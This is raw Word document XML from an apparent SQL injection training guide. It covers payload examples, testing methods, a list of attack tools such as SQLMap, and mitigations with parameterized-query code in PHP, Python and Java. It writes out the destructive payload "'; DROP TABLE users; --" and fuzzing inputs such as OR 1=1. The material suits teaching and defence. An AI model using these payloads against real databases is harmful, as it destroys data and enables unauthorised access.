            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00007EFC">
              <w:t>'; DROP TABLE users; --</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="02AAB234" w14:textId="77777777" w:rsidR="00007EFC" w:rsidRPr="00007EFC" w:rsidRDefault="00007EFC" w:rsidP="00007EFC">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00007EFC">
              <w:t>Delete table (destructive)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="63771751" w14:textId="51B90252" w:rsidR="00007EFC" w:rsidRDefault="00007EFC" w:rsidP="00007EFC">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="00007EFC">
        <w:lastRenderedPageBreak/>
        <w:t>Testing</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 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4285"/>
      </w:tblGrid>
      <w:tr w:rsidR="00007EFC" w:rsidRPr="00007EFC" w14:paraId="59A28DE9" w14:textId="77777777" w:rsidTr="00007E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C4E13" w14:textId="77777777" w:rsidR="00007EFC" w:rsidRPr="00007EFC" w:rsidRDefault="00007EFC" w:rsidP="00007EFC">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00007EFC">
              <w:t>Tool</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2A8C0B84" w14:textId="77777777" w:rsidR="00007EFC" w:rsidRPr="00007EFC" w:rsidRDefault="00007EFC" w:rsidP="00007EFC">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00007EFC">
              <w:t>Method</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00007EFC" w:rsidRPr="00007EFC" w14:paraId="702B0477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FE02" w14:textId="6F5FCD6E" w:rsidR="00007EFC" w:rsidRPr="00007EFC" w:rsidRDefault="00007EFC" w:rsidP="00007EFC">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00007EFC">
              <w:t xml:space="preserve"> Burp Suite / ZAP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="285F6ED1" w14:textId="77777777" w:rsidR="00007EFC" w:rsidRPr="00007EFC" w:rsidRDefault="00007EFC" w:rsidP="00007EFC">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00007EFC">
              <w:t>Manual request tampering</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00007EFC" w:rsidRPr="00007EFC" w14:paraId="34666505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74071" w14:textId="4958E521" w:rsidR="00007EFC" w:rsidRPr="00007EFC" w:rsidRDefault="00007EFC" w:rsidP="00007EFC">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00007EFC">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00007EFC">
              <w:t>SQLMap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00897" w14:textId="77777777" w:rsidR="00007EFC" w:rsidRPr="00007EFC" w:rsidRDefault="00007EFC" w:rsidP="00007EFC">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00007EFC">
              <w:t>Auto-detects and exploits SQLi</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00007EFC" w:rsidRPr="00007EFC" w14:paraId="703BEF5C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E3453" w14:textId="725AF9AD" w:rsidR="00007EFC" w:rsidRPr="00007EFC" w:rsidRDefault="00007EFC" w:rsidP="00007EFC">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00007EFC">
              <w:t xml:space="preserve"> Error Analysis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="086A473F" w14:textId="77777777" w:rsidR="00007EFC" w:rsidRPr="00007EFC" w:rsidRDefault="00007EFC" w:rsidP="00007EFC">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00007EFC">
              <w:t>Look for SQL error messages</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00007EFC" w:rsidRPr="00007EFC" w14:paraId="0006502A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9475" w14:textId="2729681F" w:rsidR="00007EFC" w:rsidRPr="00007EFC" w:rsidRDefault="00007EFC" w:rsidP="00007EFC">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00007EFC">
              <w:t xml:space="preserve"> Fuzzing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1BFE260C" w14:textId="77777777" w:rsidR="00007EFC" w:rsidRPr="00007EFC" w:rsidRDefault="00007EFC" w:rsidP="00007EFC">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00007EFC">
              <w:t>Try ', ", --, #, /*, ;, OR 1=1, etc.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00007EFC" w:rsidRPr="00007EFC" w14:paraId="58BBB4B8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F869" w14:textId="7A8C33EA" w:rsidR="00007EFC" w:rsidRPr="00007EFC" w:rsidRDefault="00007EFC" w:rsidP="00007EFC">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00007EFC">
              <w:t xml:space="preserve"> Boolean &amp; Time-based Tests</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1D6F7A83" w14:textId="77777777" w:rsidR="00007EFC" w:rsidRPr="00007EFC" w:rsidRDefault="00007EFC" w:rsidP="00007EFC">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00007EFC">
              <w:t>Observe differences in response or delay</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3D4D4BF0" w14:textId="6BEE6A3F" w:rsidR="00007EFC" w:rsidRDefault="00007EFC" w:rsidP="00007EFC">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="00007EFC">
        <w:t>Tools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5224"/>
      </w:tblGrid>
      <w:tr w:rsidR="00007EFC" w:rsidRPr="00007EFC" w14:paraId="5D28A521" w14:textId="77777777" w:rsidTr="00007E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21958" w14:textId="77777777" w:rsidR="00007EFC" w:rsidRPr="00007EFC" w:rsidRDefault="00007EFC" w:rsidP="00007EFC">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00007EFC">
              <w:t>Tool</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="62D33F1A" w14:textId="77777777" w:rsidR="00007EFC" w:rsidRPr="00007EFC" w:rsidRDefault="00007EFC" w:rsidP="00007EFC">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00007EFC">
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00007EFC" w:rsidRPr="00007EFC" w14:paraId="124056CF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D746" w14:textId="78F1042F" w:rsidR="00007EFC" w:rsidRPr="00007EFC" w:rsidRDefault="00007EFC" w:rsidP="00007EFC">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00007EFC">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00007EFC">
              <w:t>SQLMap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69509" w14:textId="77777777" w:rsidR="00007EFC" w:rsidRPr="00007EFC" w:rsidRDefault="00007EFC" w:rsidP="00007EFC">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00007EFC">
              <w:t>Most powerful automated SQLi exploitation tool</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00007EFC" w:rsidRPr="00007EFC" w14:paraId="0CF40773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F0330" w14:textId="513A8306" w:rsidR="00007EFC" w:rsidRPr="00007EFC" w:rsidRDefault="00007EFC" w:rsidP="00007EFC">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00007EFC">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00007EFC">
              <w:t>Havij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A26EB" w14:textId="77777777" w:rsidR="00007EFC" w:rsidRPr="00007EFC" w:rsidRDefault="00007EFC" w:rsidP="00007EFC">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00007EFC">
              <w:t>GUI-based SQLi tool (legacy)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00007EFC" w:rsidRPr="00007EFC" w14:paraId="09E9048B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86D8" w14:textId="4CC15213" w:rsidR="00007EFC" w:rsidRPr="00007EFC" w:rsidRDefault="00007EFC" w:rsidP="00007EFC">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00007EFC">
              <w:t xml:space="preserve"> Burp Suite</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7617CB8E" w14:textId="77777777" w:rsidR="00007EFC" w:rsidRPr="00007EFC" w:rsidRDefault="00007EFC" w:rsidP="00007EFC">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00007EFC">
              <w:t>Manual testing and Intruder payloads</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00007EFC" w:rsidRPr="00007EFC" w14:paraId="30DB315B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0902" w14:textId="2F767506" w:rsidR="00007EFC" w:rsidRPr="00007EFC" w:rsidRDefault="00007EFC" w:rsidP="00007EFC">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00007EFC">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00007EFC">
              <w:t>NoSQLMap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67AA0" w14:textId="77777777" w:rsidR="00007EFC" w:rsidRPr="00007EFC" w:rsidRDefault="00007EFC" w:rsidP="00007EFC">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00007EFC">
              <w:t>For NoSQL-like MongoDB injections</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00007EFC" w:rsidRPr="00007EFC" w14:paraId="5402903E" w14:textId="77777777" w:rsidTr="00007E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132BE" w14:textId="6E744403" w:rsidR="00007EFC" w:rsidRPr="00007EFC" w:rsidRDefault="00007EFC" w:rsidP="00007EFC">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00007EFC">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00007EFC">
              <w:t>Sqlninja</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00007EFC">
              <w:t xml:space="preserve"> / </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00007EFC">
              <w:t>jSQL</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00007EFC">
              <w:t xml:space="preserve"> / BBQSQL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1D049631" w14:textId="77777777" w:rsidR="00007EFC" w:rsidRPr="00007EFC" w:rsidRDefault="00007EFC" w:rsidP="00007EFC">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00007EFC">
              <w:t>Exploit MS-SQL/Oracle/MySQL-specific injections</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="39D7D694" w14:textId="516EF6D7" w:rsidR="00007EFC" w:rsidRDefault="00007EFC" w:rsidP="00007EFC">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="00007EFC">
        <w:t>Mitigation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50659FC6" w14:textId="5D7CF69D" w:rsidR="00007EFC" w:rsidRDefault="00626652" w:rsidP="00626652">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00626652">
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00007EFC" w:rsidRPr="00007EFC">
        <w:t>Use Parameterized Queries (Prepared Statements)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06ECC6CF" w14:textId="77777777" w:rsidR="00007EFC" w:rsidRPr="00626652" w:rsidRDefault="00007EFC" w:rsidP="00626652">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00007EFC">
        <w:t xml:space="preserve">PHP </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00626652">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00626652">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>stmt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00626652">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> = $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00626652">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>pdo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00626652">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>-&gt;prepare("SELECT * FROM users WHERE username = ?");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4584801B" w14:textId="3D9B8700" w:rsidR="00007EFC" w:rsidRPr="00626652" w:rsidRDefault="00007EFC" w:rsidP="00626652">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00626652">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00626652">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>stmt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00626652">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>-&gt;execute([$username]);</w:t>
      </w:r>
      <w:r w:rsidR="00626652">
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Python</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00626652">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>cursor.execute</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00626652">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>("SELECT * FROM users WHERE id = %s", (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00626652">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>user_id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00626652">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>,))</w:t>
      </w:r>
      <w:r w:rsidR="00626652">
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00626652">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>PreparedStatement</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00626652">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00626652">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>stmt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00626652">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00626652">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>conn.prepareStatement</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00626652">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>("SELECT * FROM users WHERE name = ?");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CEFDBD2" w14:textId="0733747D" w:rsidR="00007EFC" w:rsidRDefault="00007EFC" w:rsidP="00626652">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00626652">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>stmt.setString</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00626652">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>(1, name);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="446E2352" w14:textId="77777777" w:rsidR="00626652" w:rsidRPr="00626652" w:rsidRDefault="00626652" w:rsidP="00626652">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00626652">
        <w:t>2. Input Validation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="504DE292" w14:textId="77777777" w:rsidR="00626652" w:rsidRPr="00626652" w:rsidRDefault="00626652" w:rsidP="00626652">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00626652">
        <w:t xml:space="preserve">Validate input for </w:t>
      </w:r>
      <w:r w:rsidRPr="00626652">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>type, length, pattern</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F9D673" w14:textId="77777777" w:rsidR="00626652" w:rsidRPr="00626652" w:rsidRDefault="00626652" w:rsidP="00626652">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00626652">
        <w:t>Reject unexpected characters (', --, ;, /*, etc.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56CC7E3D" w14:textId="35E4EBF0" w:rsidR="00626652" w:rsidRPr="00626652" w:rsidRDefault="00626652" w:rsidP="00626652">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00626652">
        <w:lastRenderedPageBreak/>
        <w:t>3. Least Privilege</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E13C040" w14:textId="77777777" w:rsidR="00626652" w:rsidRPr="00626652" w:rsidRDefault="00626652" w:rsidP="00626652">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00626652">
        <w:t>Use DB accounts with minimal privileges:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C34C23" w14:textId="77777777" w:rsidR="00626652" w:rsidRPr="00626652" w:rsidRDefault="00626652" w:rsidP="00626652">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00626652">
        <w:t>No DROP, DELETE, UPDATE unless needed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D4CC258" w14:textId="77777777" w:rsidR="00626652" w:rsidRPr="00626652" w:rsidRDefault="00626652" w:rsidP="00626652">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00626652">
        <w:t xml:space="preserve">No </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00626652">
        <w:t>xp_cmdshell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00626652">
        <w:t xml:space="preserve"> in MSSQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E94240" w14:textId="479C2EC9" w:rsidR="00626652" w:rsidRPr="00626652" w:rsidRDefault="00626652" w:rsidP="00626652">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00626652">
        <w:t>4. Web Application Firewall (WAF)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9F57AF" w14:textId="77777777" w:rsidR="00626652" w:rsidRPr="00626652" w:rsidRDefault="00626652" w:rsidP="00626652">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00626652">
        <w:t>Detect and block known SQLi payloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F3A486" w14:textId="77777777" w:rsidR="00626652" w:rsidRPr="00626652" w:rsidRDefault="00626652" w:rsidP="00626652">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00626652">
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00626652">
        <w:t>ModSecurity</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00626652">
        <w:t>, Cloudflare, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B42688" w14:textId="20AAF7EC" w:rsidR="00626652" w:rsidRPr="00626652" w:rsidRDefault="00626652" w:rsidP="00626652">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00626652">
        <w:t>5. Error Handling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="653718E7" w14:textId="77777777" w:rsidR="00626652" w:rsidRPr="00626652" w:rsidRDefault="00626652" w:rsidP="00626652">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00626652">
        <w:t>Disable detailed SQL errors in production</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC34C88" w14:textId="77777777" w:rsidR="00626652" w:rsidRPr="00626652" w:rsidRDefault="00626652" w:rsidP="00626652">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00626652">
        <w:t>Log errors internally</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B41C36" w14:textId="4E158926" w:rsidR="00626652" w:rsidRPr="00626652" w:rsidRDefault="00626652" w:rsidP="00626652">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00626652">
        <w:t>6. ORM Caution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FAB083F" w14:textId="77777777" w:rsidR="00626652" w:rsidRPr="00626652" w:rsidRDefault="00626652" w:rsidP="00626652">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00626652">
        <w:t xml:space="preserve">Object-Relational Mappers (ORMs) </w:t>
      </w:r>
      <w:r w:rsidRPr="00626652">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>don’t guarantee protection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6867C6" w14:textId="77777777" w:rsidR="00626652" w:rsidRPr="00626652" w:rsidRDefault="00626652" w:rsidP="00626652">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00626652">
        <w:t>Don’t build dynamic queries in ORMs using concatenation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E368E4" w14:textId="57565E39" w:rsidR="001B3A4F" w:rsidRDefault="00626652" w:rsidP="00626652">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="00626652">
        <w:t>Points</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F911D1A" w14:textId="4E50BB1E" w:rsidR="00626652" w:rsidRPr="00626652" w:rsidRDefault="00626652" w:rsidP="00626652">
      <w:r w:rsidRPr="00626652">
        <w:t xml:space="preserve">SQL Injection is still one of the most </w:t>
      </w:r>
      <w:r w:rsidRPr="00626652">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>exploited vulnerabilities</w:t>
      </w:r>
      <w:r w:rsidRPr="00626652">
        <w:t xml:space="preserve"> because of poor input handling and legacy systems.”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D165579" w14:textId="6BF2EB95" w:rsidR="00626652" w:rsidRPr="00626652" w:rsidRDefault="00626652" w:rsidP="00626652">
      <w:r w:rsidRPr="00626652">
        <w:t xml:space="preserve">“The golden rule is: </w:t>
      </w:r>
      <w:r w:rsidRPr="00626652">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>never concatenate untrusted input into a query string</w:t>
      </w:r>
      <w:r w:rsidRPr="00626652">
        <w:t xml:space="preserve"> — always use </w:t>
      </w:r>
      <w:r w:rsidRPr="00626652">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>parameterized queries</w:t>
      </w:r>
      <w:r w:rsidRPr="00626652">
        <w:t>.”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD9D36F" w14:textId="6C387DEE" w:rsidR="00626652" w:rsidRPr="00626652" w:rsidRDefault="00626652" w:rsidP="00626652">
      <w:r w:rsidRPr="00626652">
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidRPr="00626652">
        <w:t xml:space="preserve">est for </w:t>
      </w:r>
      <w:r w:rsidRPr="00626652">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Blind and Time-based SQLi</w:t>
      </w:r>
      <w:r w:rsidRPr="00626652">
        <w:t>, especially in APIs and mobile backends.”</w:t>
      </w:r>
    </w:p>
